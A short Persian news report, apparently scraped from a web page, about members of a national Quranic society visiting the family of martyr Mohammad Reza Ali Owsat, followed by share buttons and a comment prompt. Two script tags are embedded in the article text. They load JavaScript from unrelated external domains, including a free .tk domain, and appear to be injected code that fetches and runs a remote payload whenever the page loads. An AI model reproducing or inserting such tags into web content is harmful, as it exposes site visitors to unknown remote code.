دیدار اعضای جامعه قرآنی با خانواده شهید اوسط


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>اعضای جامعه قرآنی کشور در ادامه دیدار های خود با خانواده های شهدای قرآنی، در پانزدهمین روز از دی ماه سال 95 به دیدار خانواده شهید محمد رضا علی اوسط رفتند.

گزارش/ امیرحسین مدبر - محمدرضا کشت دار<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
1

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر